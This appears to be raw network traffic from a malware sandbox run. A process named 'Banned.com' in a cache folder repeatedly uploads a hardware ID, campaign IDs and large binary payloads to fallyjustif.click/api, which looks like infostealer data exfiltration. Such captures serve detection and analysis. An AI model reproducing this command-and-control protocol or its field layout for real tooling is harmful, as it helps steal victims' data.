                                                            2024-12-28 20:36:03 UTC15037OUTData Raw: 2d 2d 4e 58 56 4f 4f 46 42 56 37 44 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 37 37 31 34 32 45 33 38 37 45 39 30 37 32 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 4e 58 56 4f 4f 46 42 56 37 44 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 58 56 4f 4f 46 42 56 37 44 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 0d 0a 2d 2d 4e 58 56 4f 4f 46 42 56 37 44 4f 0d 0a 43 6f
                                                            Data Ascii: --NXVOOFBV7DOContent-Disposition: form-data; name="hwid"1B77142E387E90721441EDD8E05CE3DA--NXVOOFBV7DOContent-Disposition: form-data; name="pid"2--NXVOOFBV7DOContent-Disposition: form-data; name="lid"MeHdy4--pl1new1--NXVOOFBV7DOCo
                                                            2024-12-28 20:36:04 UTC | 1143 | IN | HTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 20:36:04 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=aje3757sqpeqlq1v81clb88i30; expires=Wed, 23 Apr 2025 14:22:43 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V2i7aftt0l1iCTW4bgCkVdSjM%2F%2BCL8zq8kPUhtZTY1dvLOZBLWD5Q4hoV3OTIQmML5KOsB%2F9ZauyQMUzh59tiGie9Cy%2BJ%2BDqvx%2FjsOn2%2FofYPDEPyx8KQ%2BTsWyxbRQqTFgqfNQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f945723f9727d18-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1822&min_rtt=1808&rtt_var=706&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2841&recv_bytes=15971&delivery_rate=1520833&cwnd=218&unsent_bytes=0&cid=a795337496cb8c6a&ts=828&x=0"
                                                            2024-12-28 20:36:04 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                            Data Ascii: fok 8.46.123.189
                                                            2024-12-28 20:36:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            4 | 192.168.2.5 | 49809 | 172.67.213.115 | 443 | 6460 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-12-28 20:36:05 UTC | 281 | OUT | POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=GO21UPWVTOIT6TU1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 20557
                                                            Host: fallyjustif.click
                                                            2024-12-28 20:36:05 UTC15331OUTData Raw: 2d 2d 47 4f 32 31 55 50 57 56 54 4f 49 54 36 54 55 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 37 37 31 34 32 45 33 38 37 45 39 30 37 32 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 47 4f 32 31 55 50 57 56 54 4f 49 54 36 54 55 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 4f 32 31 55 50 57 56 54 4f 49 54 36 54 55 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 0d 0a 2d 2d
                                                            Data Ascii: --GO21UPWVTOIT6TU1Content-Disposition: form-data; name="hwid"1B77142E387E90721441EDD8E05CE3DA--GO21UPWVTOIT6TU1Content-Disposition: form-data; name="pid"3--GO21UPWVTOIT6TU1Content-Disposition: form-data; name="lid"MeHdy4--pl1new1--
                                                            2024-12-28 20:36:05 UTC5226OUTData Raw: 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb
                                                            Data Ascii: MMZh'F3Wun 4F([:7s~X`nO`
                                                            2024-12-28 20:36:06 UTC | 1137 | IN | HTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 20:36:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=d5c6okj4ej91pm270r9ijh81oa; expires=Wed, 23 Apr 2025 14:22:45 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dt4aVp6vpXH%2BBDacuYSo3ClcM2MeUBRSo5YUD%2Fh2J%2BTLrCd4qofQqCKB1f9u0uSrOoIvHhmPv66drMCZmtmqvWarGHwxE3M7AFD644VK3Hj%2BsqGAIHwTYDgf25iA7enDsE%2By4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f9457317b9442ce-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1653&rtt_var=630&sent=14&recv=27&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21518&delivery_rate=1722713&cwnd=233&unsent_bytes=0&cid=f595c14f52eb6c1a&ts=989&x=0"
                                                            2024-12-28 20:36:06 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                            Data Ascii: fok 8.46.123.189
                                                            2024-12-28 20:36:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            5 | 192.168.2.5 | 49815 | 172.67.213.115 | 443 | 6460 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-12-28 20:36:08 UTC | 277 | OUT | POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=7R2O5KRSM9MP5
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1207
                                                            Host: fallyjustif.click
                                                            2024-12-28 20:36:08 UTC1207OUTData Raw: 2d 2d 37 52 32 4f 35 4b 52 53 4d 39 4d 50 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 37 37 31 34 32 45 33 38 37 45 39 30 37 32 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 37 52 32 4f 35 4b 52 53 4d 39 4d 50 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 52 32 4f 35 4b 52 53 4d 39 4d 50 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 0d 0a 2d 2d 37 52 32 4f 35 4b 52 53 4d
                                                            Data Ascii: --7R2O5KRSM9MP5Content-Disposition: form-data; name="hwid"1B77142E387E90721441EDD8E05CE3DA--7R2O5KRSM9MP5Content-Disposition: form-data; name="pid"1--7R2O5KRSM9MP5Content-Disposition: form-data; name="lid"MeHdy4--pl1new1--7R2O5KRSM
                                                            2024-12-28 20:36:08 UTC | 1140 | IN | HTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 20:36:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=3ared5b1tdk708ksg6b0dom7i5; expires=Wed, 23 Apr 2025 14:22:47 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ey9CzpiMv6mGe8rdgAS4%2By%2B6a6D07s%2BdDZyBcgvrzxK1aVh%2BtCf3BhTmFG9midewpGEvThjaMg804Sr%2F1yzmtvBe%2FAqBt5bXqMhLxLgqWKI%2BfAAjxUqveRfsimI%2BogpY1XFATQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f9457406f9b435c-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2177&min_rtt=2175&rtt_var=819&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2120&delivery_rate=1332724&cwnd=249&unsent_bytes=0&cid=780199a02de77932&ts=771&x=0"
                                                            2024-12-28 20:36:08 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                            Data Ascii: fok 8.46.123.189
                                                            2024-12-28 20:36:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            6 | 192.168.2.5 | 49821 | 172.67.213.115 | 443 | 6460 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-12-28 20:36:10 UTC | 277 | OUT | POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=RI5EHQNV84U
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 587822
                                                            Host: fallyjustif.click
                                                            2024-12-28 20:36:10 UTC15331OUTData Raw: 2d 2d 52 49 35 45 48 51 4e 56 38 34 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 37 37 31 34 32 45 33 38 37 45 39 30 37 32 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 52 49 35 45 48 51 4e 56 38 34 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 49 35 45 48 51 4e 56 38 34 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 0d 0a 2d 2d 52 49 35 45 48 51 4e 56 38 34 55 0d 0a 43 6f
                                                            Data Ascii: --RI5EHQNV84UContent-Disposition: form-data; name="hwid"1B77142E387E90721441EDD8E05CE3DA--RI5EHQNV84UContent-Disposition: form-data; name="pid"1--RI5EHQNV84UContent-Disposition: form-data; name="lid"MeHdy4--pl1new1--RI5EHQNV84UCo
                                                            2024-12-28 20:36:10 UTC | 15331 | OUT | Data Raw: c1 48 f7 20 6a 54 7a 20 fc e7 7a ab 08 9e c6 35 ae b7 c0 57 40 0d bb 71 ad 28 25 c9 b8 8c c7 aa e2 2c e5 ea 11 4e b2 20 b9 8a 9d 7f 84 b8 7f 8f 2c 06 7e c0 fa b1 19 e7 5b 30 9a 7b a6 01 03 db da c6 57 30 75 b2 10 68 43 a8 eb c9 7f 17 5f 34 ec e5 00 57 24 33 0e da 5c bb 17 9f 21 16 6f e3 25 5c a4 94 8d 9e 43 fb f1 bd 96 b9 29 9a f6 dd 21 91 d5 6f ae b6 a8 fa 94 e1 92 55 fc ad 41 a7 55 7f 49 97 a5 57 4c 6b 5f bc 0f f4 33 46 72 56 39 38 2e 68 0d 87 72 16 a6 44 99 d6 de 18 4c 75 33 68 ad ee aa 35 e3 ce 44 91 ed 3b 9e 2f 5f 46 91 67 51 5d f1 aa 54 07 f1 9e 44 1d 3e e7 02 53 a3 53 45 f1 ed df 19 bf 64 dd 9e ab e8 c4 fa c3 3e de a8 c6 4d b3 6c 6e f5 fe bc 94 14 0d ce 5a ee 82 51 d4 b1 d8 7b 33 7b db 74 21 ec 9c ff 6b 0d a8 b2 c5 37 11 72 c3 48 2e 50 91 42 dc d5
                                                            Data Ascii: H jTz z5W@q(%,N ,~[0{W0uhC_4W$3\!o%\C)!oUAUIWLk_3FrV98.hrDLu3h5D;/_FgQ]TD>SSEd>MlnZQ{3{t!k7rH.PB
                                                            2024-12-28 20:36:10 UTC | 15331 | OUT | Data Raw: 5b 60 2e 41 60 d0 bb ad 94 bb 4a 0e 23 ed b3 8a e0 8b fa 30 6a ed c2 11 fb 14 c4 c3 2b cc bd 57 f2 01 44 6e 24 e9 f0 be 57 ea d0 c3 79 1c 2c a2 ed 74 ba 16 62 61 bf ad 65 83 83 eb e6 7f 88 2a 9e d1 30 9f 43 ef 40 91 f5 9f 09 a5 08 e2 f1 93 7e 2c 61 ba 32 f8 e8 49 96 59 2c 2d d9 3e 74 ec 1a ba 38 91 37 2f 04 81 89 78 b9 c8 e7 b1 15 14 47 27 c1 46 1e 70 c1 12 69 d9 9e a4 59 70 a1 35 4b fc de 92 6d e3 b1 9d b6 41 0d e0 11 3f fa 06 01 5c 24 71 98 7e 19 a2 04 0d 98 dd 3e 4e 74 e7 e2 92 8c 99 c2 77 85 f9 b3 85 17 6e 2a e0 7a 94 1b 8d 07 35 dc b9 39 21 95 b3 8f 85 1c 7e 4f 24 5e 54 04 87 50 91 c5 57 f1 43 a4 e5 cc b7 0b 3d f5 ec d2 6a c6 70 c8 50 b4 90 d1 f8 de b3 4f 07 45 f9 dd 45 c1 f9 f2 a1 1d 37 6d f7 7c 0e 9f 52 76 67 a2 72 a0 0c 00 de 8b db 59 b7 65 52 1d
                                                            Data Ascii: [`.A`J#0j+WDn$Wy,tbae*0C@~,a2IY,->t87/xG'FpiYp5KmA?\$q~>Ntwn*z59!~O$^TPWC=jpPOEE7m|RvgrYeR
                                                            2024-12-28 20:36:10 UTC | 15331 | OUT | Data Raw: 7d 4f 7c 89 7d 75 f9 09 e8 24 e1 8c b4 52 cf 54 4f 71 3e 56 b5 aa 80 d1 58 a5 26 3f ae fb 5b a4 cf fe 8c 3b 7c e2 3a f7 ed cf d1 d6 1d 1e 00 83 53 1c 22 c9 22 4a 8b a1 be 67 e8 ee c7 01 8a 8e 5c d0 bb 4a b9 64 00 ac b4 5a 82 c3 e1 91 b2 5b c7 bb ed 20 99 4d 91 ff 5a 69 f6 61 fa c1 ed 2b 42 2c 51 b0 24 0f 6c 5c 33 0c 97 f3 66 93 09 29 6d 38 d3 6c 7c fb ef 02 26 3e 91 99 53 dc f1 34 c0 fe 86 bf fd 60 a8 a4 c0 27 44 6a bb c7 63 7d a9 7f bf c4 c4 06 ad e4 5f 1a 79 8c 52 22 4c 04 b6 ae 78 d3 0c 55 3a ea 8d a2 aa ec 3d b5 86 23 8a f8 fe f4 95 20 92 9e 97 be b4 f9 bb 32 66 b0 d6 bd d3 43 19 f3 66 a1 bd 29 b2 64 fd 99 a5 83 d5 43 55 b8 f6 32 c4 37 a9 bc c0 9b 7b a1 59 69 54 f1 75 1d fc 0e 3c 42 56 3b c9 8c f6 6e 17 0d 92 13 84 ba 00 1d df 58 fa fb d5 e5 c5 e2 33
                                                            Data Ascii: }O|}u$RTOq>VX&?[;|:S""Jg\JdZ[ MZia+B,Q$l\3f)m8l|&>S4`'Djc}_yR"LxU:=# 2fCf)dCU27{YiTu<BV;nX3
                                                            2024-12-28 20:36:10 UTC | 15331 | OUT | Data Raw: eb a7 87 c7 2e 28 44 cb 4a f2 19 ef 06 6f ba 44 70 c9 e4 f6 1f 0b e2 ee 99 bc 34 e8 cb a5 59 e1 46 13 b3 4c 23 55 fa 0f 0b 42 bf 80 bc e7 9f 2f 3a 27 8f 11 76 3c 25 5c 75 9f da 75 5e 26 47 bd 01 1e e0 8f 58 32 51 57 3a 9b ea e1 14 5d 1a df 48 f9 7a 9d 05 59 fa b9 23 c7 0f 52 d4 54 41 ee 6b a8 18 60 70 1b 3f 32 4a 98 35 3e 89 3a e0 12 34 2a d4 90 bf 59 04 24 15 c1 b6 b9 4d aa 32 2f a9 90 81 46 26 fe 65 18 1e 40 35 9a 8c f7 3c ab 51 f0 92 7e 07 d3 82 43 3d 21 c0 43 81 ac 48 83 70 20 68 8d 13 ba 02 48 fc f6 29 e0 f2 6c 40 7b 1e 43 fa 1f b5 c9 00 20 f4 06 44 f1 00 7b 10 06 f0 ad 90 be c3 3e b4 7e 01 c0 cf 91 67 1b 4d 3e 90 07 dd 28 c2 83 e5 5b 68 e0 f1 9a 0a 27 67 f1 d1 d1 40 2d 51 40 5a 1f b8 81 0e d3 b8 b6 01 9d 01 a1 d6 50 24 b2 f8 76 32 ba b1 6b e2 b7 fd
                                                            Data Ascii: .(DJoDp4YFL#UB/:'v<%\uu^&GX2QW:]HzY#RTAk`p?2J5>:4*Y$M2/F&e@5<Q~C=!CHp hH)l@{C D{>~gM>([h'g@-Q@ZP$v2k
                                                            2024-12-28 20:36:10 UTC | 15331 | OUT | Data Raw: f4 d7 2c b0 36 a5 96 15 10 0b f2 d1 3c 11 08 ac 5e 90 ff 6b 17 28 26 15 34 69 c8 c6 d0 2a c8 48 fa db 81 57 c4 82 e5 db 80 61 6a ca fc b8 fe 49 5e 12 48 bf 07 4f e4 38 77 4c 19 de 1f cf 47 6f 2e bd c4 bd a0 38 b3 15 6d f0 88 25 73 9b d3 c0 70 2e d3 2e d8 c5 eb 4b bc 7d 95 ff fb e8 a1 e6 0b e2 e0 a7 b4 73 22 aa 2f 44 fb b9 77 f5 5f f8 6e e1 e6 b5 bd 68 f8 7d 68 d4 ce e2 5a a7 4a d2 a8 c9 e0 b4 90 38 6a 43 9a ea b7 7a 3e 5e 05 ca 4c e4 5d 58 c3 b5 65 fb 39 b3 d2 28 7f e5 c6 3d 8e 59 b2 d6 16 e3 4b e2 eb 04 13 96 d4 85 4e f9 29 93 a8 a4 de e8 a1 55 f4 fc 31 97 1a 03 b1 02 c7 69 d3 b5 94 27 bf 65 12 d6 6e 94 a7 c0 e4 81 a9 5d 78 7d cf 92 60 f0 97 80 f0 9a ad 21 d3 1b 87 fa 51 d2 a1 74 45 45 1d d5 2e 40 8d 8b 96 5c ed e8 b1 40 36 7a 7c 5b 63 c4 d1 28 66 ec ad
                                                            Data Ascii: ,6<^k(&4i*HWajI^HO8wLGo.8m%sp..K}s"/Dw_nh}hZJ8jCz>^L]Xe9(=YKN)U1i'en]x}`!QtEE.@\@6z|[c(f
                                                            2024-12-28 20:36:10 UTC | 15331 | OUT | Data Raw: 79 1f b5 6f f6 58 17 fd c8 e6 eb bf fe 04 a1 99 ea 27 3b 77 2d f1 02 4a 55 9e d5 de 5d df 03 ce ec c2 03 cb 09 0b d0 64 ec 20 c7 2e 69 31 69 81 7e 36 e5 d7 91 c5 04 74 6c 95 9d d3 03 57 17 1e 15 52 13 21 0f 49 3d 0c d6 7c d6 54 41 ed c8 1f 9c 02 4d 10 74 70 e3 cd 88 1a d8 42 90 4c 12 f3 e7 5f 42 60 1c b1 f8 93 4a e1 23 d8 46 6e fe c7 b0 58 e0 da fb 77 62 0e 43 84 6d 18 49 3d b7 af e6 8a c4 7e 56 86 c3 bf 5a 10 29 3d 52 74 52 70 d4 c6 96 94 21 27 33 26 87 0d c7 d0 e4 a7 7e df a5 24 ae ed 21 8e ea 63 6f c9 63 6f da 49 9b 6d 9e c3 b6 cd 6c 61 8f 9c 4d 0f 2e 94 83 67 7a c2 67 7a 22 03 56 af 61 64 3d 08 00 12 28 ec 12 88 09 0e 61 a9 0e b9 4c aa 7f d0 19 3f 7a e6 da 96 7d b0 12 53 89 aa 6c 0f 4b 0d ef 9e 28 7a 41 0a d8 f8 23 9f a9 52 5d 5f 44 18 92 1d df ce ac
                                                            Data Ascii: yoX';w-JU]d .i1i~6tlWR!I=|TAMtpBL_B`J#FnXwbCmI=~VZ)=RtRp!'3&~$!cocoImlaM.gzgz"Vad=(aL?z}SlK(zA#R]_D
                                                            2024-12-28 20:36:10 UTC | 15331 | OUT | Data Raw: 55 20 10 af 92 0e af ca 4d 2d 1f ab 1a 34 23 a7 6f c9 29 c2 c4 3f c7 1c 72 61 ec 06 39 3a 18 af 42 bc 63 54 22 73 cf e8 e3 88 83 07 e2 93 c7 3f 74 a1 c0 ce 9f 50 42 f9 ec 2d 5d 03 6d ff 2b 26 b8 64 d2 93 11 e6 5d b6 4c bf 71 a9 06 e5 d7 ec a7 e3 95 1e 2d c6 bd e8 bf e6 5e 0e d5 6c 63 d3 e4 44 59 26 53 01 cb 81 87 b7 89 b5 de 0c fb 54 13 5e 49 bb 35 38 72 34 38 3f 01 23 03 ff 79 1f 3e eb 2c 2a cb 11 63 69 cd ba e6 36 d9 f2 47 3e b9 dc 23 58 29 82 dc 0d ab bd 3f d1 da e5 63 e5 62 d2 44 ef 60 96 4e 6d 49 ca 59 34 43 9f e4 e8 2b 71 45 69 16 8a fd c6 eb 0b f7 96 45 87 7c d3 0d 72 37 98 03 ec f0 70 3b c6 de 4e 6d b4 af c3 76 d2 00 a0 70 5b d1 eb bb 14 e3 4d 7e 79 8e d5 6b 70 22 21 b0 e0 0f fe 03 ff 41 4f 4d 55 8c f3 40 84 45 75 fe 5a cb c9 67 ba a4 1b 0a 99 bd
                                                            Data Ascii: U M-4#o)?ra9:BcT"s?tPB-]m+&d]Lq-^lcDY&ST^I58r48?#y>,*ci6G>#X)?cbD`NmIY4C+qEiE|r7p;Nmvp[M~ykp"!AOMU@EuZg
                                                            2024-12-28 20:36:10 UTC | 15331 | OUT | Data Raw: 11 75 30 89 e6 f9 64 bd 8b 13 3b 8d ac c9 7f 7c cf a1 f0 81 f0 67 24 ec f9 94 1a 51 8b 44 94 ca b1 08 16 ac 0b 25 50 87 bc 25 1d db 1b 6c b1 64 b3 d7 78 3b 96 c8 89 45 86 ce 8c 14 3c 95 cf 61 be fc 3e 30 67 79 5e 21 42 3d cc a6 43 be 00 79 66 f3 ad 97 48 1f 2f 67 9d cb 98 ad 8f 43 03 c3 43 96 44 9d 6f 9e 89 6b 1a 4a 1e 65 ec be 01 48 a7 70 0e 84 0c 63 88 79 88 d6 f9 e1 0e 2a bc bc 36 42 c9 cd e0 97 f8 6c eb 5a e0 56 f1 75 a7 c5 4d ba 9c 2c e4 d8 11 dc a2 7b 96 fe 9d 08 58 20 05 ea 80 eb 49 4e a7 50 21 83 77 58 9f 46 0f 09 58 7e 9e b0 50 ea f4 21 a4 ec 47 90 a7 74 64 0f d0 fe c1 d3 e0 0c 9b 54 9c 15 87 d6 c4 28 cc 52 d5 3d fe 43 8f f0 e3 78 a1 f7 34 c2 7b 44 04 72 9b 69 7f f4 7a 89 17 a0 c8 85 d0 84 a8 c2 42 77 e5 9c 29 a6 7b b9 5a b3 ad 2b 1b 65 7b 7d 48
                                                            Data Ascii: u0d;|g$QD%P%ldx;E<a>0gy^!B=CyfH/gCCDokJeHpcy*6BlZVuM,{X INP!wXFX~P!GtdT(R=Cx4{DrizBw){Z+e{}H
                                                            2024-12-28 20:36:10 UTC | 15331 | OUT | Data Raw: 8b ba 98 f2 6a 55 35 1f 8b 8b 2a 1c d4 e5 37 8a 76 14 47 6a b0 08 b1 00 0e 5e 9b 8d 34 ed 45 36 6b 88 6d 06 82 af 60 32 3d 2f 56 a3 3d 7f a0 14 51 be 63 26 c7 61 d2 82 59 57 eb 5c b2 56 1c eb 95 3d a7 88 60 1a ab 57 bc ec dc 37 ca bb 3a d9 21 1f 42 ba 82 c1 62 5b 7e 65 b4 38 2b 09 b7 0f 49 9e 93 b0 c4 10 55 82 cf f2 5d 54 e8 e1 61 bd 56 db 3b 3b 45 1b 99 26 66 a8 a4 c2 19 2d c9 c9 6f 80 76 49 86 c8 d2 c6 d4 1f 5c ae e8 70 f7 cf 0d 30 ed 3c 0e b0 99 75 a3 b7 6b 36 0d 12 3a 3c c5 f1 23 e2 42 0a d8 bf 06 70 5a ca c2 73 60 ef 5a 22 10 28 3c 10 6f 5b e3 26 be f2 11 df f0 6d 78 84 65 b5 c4 ad b7 80 48 55 55 53 6d 17 c6 df 4e a5 35 f5 8f 8e da 3b 68 8c 21 1b 0a 88 b8 89 42 95 9b 31 b8 f8 2a 1f af a9 76 85 7d 6f 5b ed 5f a6 e5 78 11 dc 14 e4 f4 b1 2a 35 5e 03 c8
                                                            Data Ascii: jU5*7vGj^4E6km`2=/V=Qc&aYW\V=`W7:!Bb[~e8+IU]TaV;;E&f-ovI\p0<uk6:<#BpZs`Z"(<o[&mxeHUUSmN5;h!B1*v}o[_x*5^
                                                            2024-12-28 20:36:12 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 20:36:12 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=5kn67vofkh6ovimgcbcpknpij2; expires=Wed, 23 Apr 2025 14:22:51 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
